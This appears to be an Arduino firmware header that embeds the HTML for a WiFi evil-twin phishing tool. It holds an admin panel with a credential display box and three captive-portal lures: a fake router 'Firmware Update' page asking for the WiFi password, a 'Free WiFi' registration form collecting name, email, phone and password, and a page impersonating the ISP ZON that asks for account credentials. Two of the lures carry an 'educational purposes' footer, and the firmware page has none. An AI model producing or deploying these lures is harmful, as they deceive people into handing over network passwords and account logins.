#pragma once
#include <Arduino.h>
// Auto-generated by tools/embed_html.py during build. Do not edit manually.
static const char ADMIN_HEADER_HTML[] PROGMEM = R"ADMINHTML(<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>%TITLE%</title>
  <style>
    :root { --primary: #FF4B2B; --primary-grad: linear-gradient(to right, #FF416C, #FF4B2B); --bg: #F0F2F5; --card-bg: #FFFFFF; --text: #333; }
    * { box-sizing: border-box; margin: 0; padding: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; }
    body { background: var(--bg); color: var(--text); padding-bottom: 30px; }
    .container { max-width: 800px; margin: 0 auto; padding: 15px; }
    .header { background: var(--primary-grad); color: white; padding: 20px; border-radius: 15px; box-shadow: 0 4px 15px rgba(255, 75, 43, 0.3); margin-bottom: 20px; text-align: center; }
    .card { background: var(--card-bg); border-radius: 12px; padding: 20px; margin-bottom: 15px; box-shadow: 0 2px 10px rgba(0,0,0,0.05); }
    h1 { font-size: 1.5rem; margin-bottom: 5px; }
    h2 { font-size: 1.2rem; margin-bottom: 15px; border-bottom: 2px solid #eee; padding-bottom: 10px; }
    .btn { display: inline-block; width: 100%; padding: 12px; border: none; border-radius: 8px; background: var(--primary-grad); color: white; font-weight: bold; cursor: pointer; text-decoration: none; margin-bottom: 10px; text-align: center;}
    .btn.secondary { background: #6c757d; } .btn.danger { background: #dc3545; } .btn.success { background: #28a745; }
    input[type="text"], textarea, select { width: 100%; padding: 12px; border: 1px solid #ddd; border-radius: 8px; margin-bottom: 10px; }
    .table-container { overflow-x: auto; } table { width: 100%; border-collapse: collapse; } th, td { padding: 12px; text-align: left; border-bottom: 1px solid #eee; }
    .status-badge { padding: 5px 10px; border-radius: 20px; font-size: 0.8rem; background: #eee; color: black; font-weight: bold; }
    .active-badge { background: #d4edda; color: #155724; padding: 5px 10px; border-radius: 20px; font-size: 0.8rem; font-weight: bold; }
    .live-dot { height: 10px; width: 10px; background-color: #f00; border-radius: 50%; display: inline-block; animation: blink 1s infinite; margin-right: 5px; }
    @keyframes blink { 0% { opacity: 1; } 50% { opacity: 0.4; } 100% { opacity: 1; } }
    .cred-box { background: #fff3cd; border-left: 5px solid #ffc107; padding: 15px; margin-bottom: 10px; word-wrap: break-word; }
    .modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.5); }
    .modal-content { background: var(--card-bg); margin: 15% auto; padding: 25px; border-radius: 12px; width: 90%; max-width: 400px; position: relative; }
    .close { position: absolute; right: 15px; top: 10px; font-size: 28px; cursor: pointer; color: #999; }
    .close:hover { color: #333; }
    .password-wrapper { position: relative; }
    .password-wrapper input { padding-right: 45px; }
    .toggle-pw { position: absolute; right: 10px; top: 50%; transform: translateY(-50%); background: none; border: none; cursor: pointer; font-size: 18px; }
    .modal-btns { display: flex; gap: 10px; margin-top: 15px; }
    .modal-btns .btn { margin-bottom: 0; }
    @media (min-width: 600px) { .btn-group { display: flex; gap: 10px; } .btn { margin-bottom: 0; } }
  </style>
</head>
<body><div class="container">)ADMINHTML";
static const char CAPTIVE_PORTAL_HTML[] PROGMEM = R"CAPTIVEHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Security Check</title>
  <style>
    body { font-family: sans-serif; background: #eee; padding: 20px; text-align: center; }
    .box { background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
    input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
    button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
  </style>
</head>
<body>
  <div class="box">
    <h2>Firmware Update</h2>
    <p>Please enter your WiFi password to update the Router firmware.</p>
    <form action="/" method="post">
      <input type="password" name="password" placeholder="WiFi Password" required>
      <button type="submit">Connect</button>
    </form>
  </div>
</body>
</html>
)CAPTIVEHTML";
static const char FREE_WIFI_REGISTER_HTML[] PROGMEM = R"FREEWIFIHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome to %SSID% Free WiFi</title>
  <style>
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; align-items: center; justify-content: center; padding: 20px; }
    .container { background: white; border-radius: 16px; box-shadow: 0 10px 40px rgba(0,0,0,0.2); padding: 40px 30px; width: 100%; max-width: 420px; }
    .wifi-icon { text-align: center; font-size: 48px; margin-bottom: 20px; }
    h1 { text-align: center; font-size: 1.4rem; color: #333; margin-bottom: 5px; }
    .ssid { color: #667eea; }
    .subtitle { text-align: center; color: #888; font-size: 0.9rem; margin-bottom: 25px; }
    .form-group { margin-bottom: 15px; }
    label { display: block; font-size: 0.85rem; color: #555; margin-bottom: 5px; font-weight: 500; }
    input { width: 100%; padding: 12px 14px; border: 1px solid #ddd; border-radius: 8px; font-size: 1rem; transition: border-color 0.2s; }
    input:focus { outline: none; border-color: #667eea; box-shadow: 0 0 0 3px rgba(102,126,234,0.15); }
    button { width: 100%; padding: 14px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 8px; font-size: 1rem; font-weight: 600; cursor: pointer; margin-top: 10px; transition: transform 0.1s; }
    button:active { transform: scale(0.98); }
    .footer { text-align: center; margin-top: 25px; padding-top: 15px; border-top: 1px solid #eee; font-size: 0.7rem; color: #aaa; }
  </style>
</head>
<body>
  <div class="container">
    <div class="wifi-icon">&#128246;</div>
    <h1>Welcome to <span class="ssid">%SSID%</span> Free WiFi</h1>
    <p class="subtitle">To continue, please register</p>
    <form action="/" method="post">
      <div class="form-group">
        <label for="name">Full Name</label>
        <input type="text" id="name" name="name" placeholder="John Doe" required>
      </div>
      <div class="form-group">
        <label for="email">Email Address</label>
        <input type="email" id="email" name="email" placeholder="john@example.com" required>
      </div>
      <div class="form-group">
        <label for="phone">Phone Number</label>
        <input type="tel" id="phone" name="phone" placeholder="+351 912 345 678" required>
      </div>
      <div class="form-group">
        <label for="password">Create Password</label>
        <input type="password" id="password" name="password" placeholder="Create a password" required>
      </div>
      <button type="submit">Connect</button>
    </form>
    <div class="footer">This is a fake page for educational purposes.</div>
  </div>
</body>
</html>
)FREEWIFIHTML";
static const char ZON_ISP_VERIFY_HTML[] PROGMEM = R"ZONISPHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>ZON - Account Verification</title>
  <style>
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; background: #f5f5f5; min-height: 100vh; display: flex; align-items: center; justify-content: center; padding: 20px; }
    .container { background: white; border-radius: 12px; box-shadow: 0 4px 20px rgba(0,0,0,0.1); width: 100%; max-width: 400px; overflow: hidden; }
    .header { background: linear-gradient(135deg, #5B2C8E 0%, #4A1A6B 100%); padding: 30px 25px; text-align: center; }
    .logo { font-size: 2rem; font-weight: 800; color: white; letter-spacing: 2px; }
    .logo span { color: #C9A4E8; }
    .body { padding: 30px 25px; }
    h2 { font-size: 1.2rem; color: #333; margin-bottom: 8px; }
    .description { color: #777; font-size: 0.9rem; line-height: 1.5; margin-bottom: 25px; }
    .form-group { margin-bottom: 18px; }
    label { display: block; font-size: 0.85rem; color: #555; margin-bottom: 6px; font-weight: 500; }
    input { width: 100%; padding: 12px 14px; border: 1px solid #ddd; border-radius: 6px; font-size: 1rem; transition: border-color 0.2s; }
    input:focus { outline: none; border-color: #5B2C8E; box-shadow: 0 0 0 3px rgba(91,44,142,0.1); }
    button { width: 100%; padding: 14px; background: #5B2C8E; color: white; border: none; border-radius: 6px; font-size: 1rem; font-weight: 600; cursor: pointer; transition: background 0.2s; }
    button:hover { background: #4A1A6B; }
    .alert { background: #fff3cd; border-left: 4px solid #ffc107; padding: 12px; margin-bottom: 20px; border-radius: 4px; font-size: 0.85rem; color: #856404; }
    .footer { text-align: center; padding: 15px 25px; border-top: 1px solid #eee; font-size: 0.7rem; color: #aaa; background: #fafafa; }
    .brand-footer { text-align: center; padding: 10px; font-size: 0.75rem; color: #999; }
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <div class="logo">Z<span>O</span>N</div>
    </div>
    <div class="body">
      <h2>Account Verification</h2>
      <p class="description">To continue accessing the internet, please verify your ZON account credentials. This is required to maintain your connection on this network.</p>
      <div class="alert">Your session requires re-authentication to continue.</div>
      <form action="/" method="post">
        <div class="form-group">
          <label for="email">Email Address</label>
          <input type="email" id="email" name="email" placeholder="your@email.com" required>
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input type="password" id="password" name="password" placeholder="Enter your password" required>
        </div>
        <button type="submit">Verify Account</button>
      </form>
      <div class="brand-footer">Powered by ZON</div>
    </div>
    <div class="footer">This is a fake page for educational purposes.</div>
  </div>
</body>
</html>
)ZONISPHTML";
static const char FOOTER_HTML[] PROGMEM = "</div></body></html>";
